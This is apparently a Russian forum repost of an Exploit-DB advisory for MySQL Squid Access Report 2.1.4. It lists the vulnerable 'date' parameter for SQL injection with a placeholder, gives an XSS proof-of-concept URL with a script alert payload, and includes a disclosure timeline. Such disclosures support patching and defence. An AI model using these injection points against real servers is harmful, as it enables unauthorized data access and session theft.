Exploit MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
44483
Проверка EDB
  1. Пройдено
Автор
KEERATI T.
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2018-04-18
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting
Код:
# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities
# Date: 14-13-2018
# Software Link: https://sourceforge.net/projects/mysar/
# Exploit Author: Keerati T.
# Version: 2.1.4
# Tested on: Linux

1. Description
SQL injection and Cross site script vulnerabilities are found on ALL
parameter of MySAR.

2. Proof of Concept
FOR EXAMPLE
- SQL injection
http://server/mysar/index.php?a=IPSummary&date=[SQLi]
-XSS
http://server/mysar/index.php?a=IPSummary&date=2018-04-14
"><script>alert(1)</script>

3. Timeline
8-3-2018 - Report on their Github. (
https://github.com/coffnix/mysar-ng/issues/12)
-- 1 month later, no any response from vendor. --
14-4-2018 - Public.
 
Источник
www.exploit-db.com

Похожие темы